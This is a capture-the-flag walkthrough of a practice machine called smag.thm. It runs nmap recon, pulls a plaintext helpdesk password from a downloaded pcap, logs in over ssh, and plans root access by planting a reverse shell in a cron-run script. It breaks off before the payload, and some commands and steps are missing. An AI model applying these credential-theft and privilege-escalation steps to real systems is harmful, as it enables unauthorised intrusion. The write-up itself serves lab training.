Create a directory for machine on the Desktop and a directory containing the scans with nmap.
Task 2 - Reconnaissance
su
echo "10.10.71.2 smag.thm" >> /etc/hosts
mkdir thm/smag.thm
cd thm/smag.thm
mkdir {nmap,content,exploits,scripts}
# At the end of the room
# To clean up the last line from the /etc/hosts file
sed -i '$ d' /etc/hosts
I prefer to start recon by pinging the target, this allows us to check connectivity and get OS info.
ping -c 3 smag.thm
PING smag.thm (10.10.71.2) 56(84) bytes of data.
64 bytes from smag.thm (10.10.71.2): icmp_seq=2 ttl=63 time=97.3 ms
64 bytes from smag.thm (10.10.71.2): icmp_seq=3 ttl=63 time=68.6 ms
Sending these three ICMP packets, we see that the Time To Live (TTL) is ~64 secs. this indicates that the target is a *nix, while Windows systems usually have a TTL of 128 secs.
2.1 - What is the secret spicy soup recipe?
Of course, start to check information scanning open ports:
Starting Nmap 7.94 ( https://nmap.org ) at 2023-07-31 18:24 EDT
Initiating SYN Stealth Scan at 18:24
Scanning smag.thm (10.10.71.2) [65536 ports]
Discovered open port 80/tcp on 10.10.71.2
Discovered open port 22/tcp on 10.10.71.2
Completed SYN Stealth Scan at 18:24, 18.21s elapsed (65536 total ports)
Nmap scan report for smag.thm (10.10.71.2)
Host is up, received user-set (1.8s latency).
Scanned at 2023-07-31 18:24:20 EDT for 19s
Not shown: 59890 closed tcp ports (reset), 5644 filtered tcp ports (no-response)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT STATE SERVICE REASON
22/tcp open ssh syn-ack ttl 63
80/tcp open http syn-ack ttl 63
command
result
sudo
run as root
sC
run default scripts
sV
enumerate versions
A
aggressive mode
T4
run a bit faster
oN
output to file with nmap formatting
It looks like there are 2 open ports on the machine: 22, 80.
Now, we need to search which services are running on open ports:
We find 'only' this good path: http:\\smag.thm/mail
Give focus on this .pcap file (wireshark extension), how first paragraph suggests, we can download all attachments using wget command.
We can open file downloaded using wireshark or command strings:
strings dHJhY2Uy.pcap
There's a fantastic info: username=helpdesk&password=cH4nG3M3_n0w
We can use this credentials to try ssh access:
ssh helpdesk@smag.thm
Task 3 - What is the user flag?
We quickly try to find user.txt flag using find command:
🚩 Flag 1 (user.txt)
Task 4 - What is the root flag?
We can continue to explore files:
ls -lah *
-rw-r--r-- 1 lennie lennie 38 Nov 12 2020 user.txt
Documents:
total 20K
drwxr-xr-x 2 lennie lennie 4.0K Nov 12 2020 .
drwx------ 5 lennie lennie 4.0K May 15 13:37 ..
-rw-r--r-- 1 root root 139 Nov 12 2020 concern.txt
-rw-r--r-- 1 root root 47 Nov 12 2020 list.txt
-rw-r--r-- 1 root root 101 Nov 12 2020 note.txt
scripts:
total 16K
drwxr-xr-x 2 root root 4.0K Nov 12 2020 .
drwx------ 5 lennie lennie 4.0K May 15 13:37 ..
-rwxr-xr-x 1 root root 77 Nov 12 2020 planner.sh
-rw-r--r-- 1 root root 1 May 15 13:38 startup_list.txt
cat scripts/*
cat Documents/*
cat /etc/print.sh
ls -lah /etc/print.sh
-rwx------ 1 lennie lennie 25 Nov 12 2020 /etc/print.sh
We see that planner.sh will be run as root (with a cron job), and use /etc/print.sh with lennie permission, we can modify it inserting a reverse shell as payload:
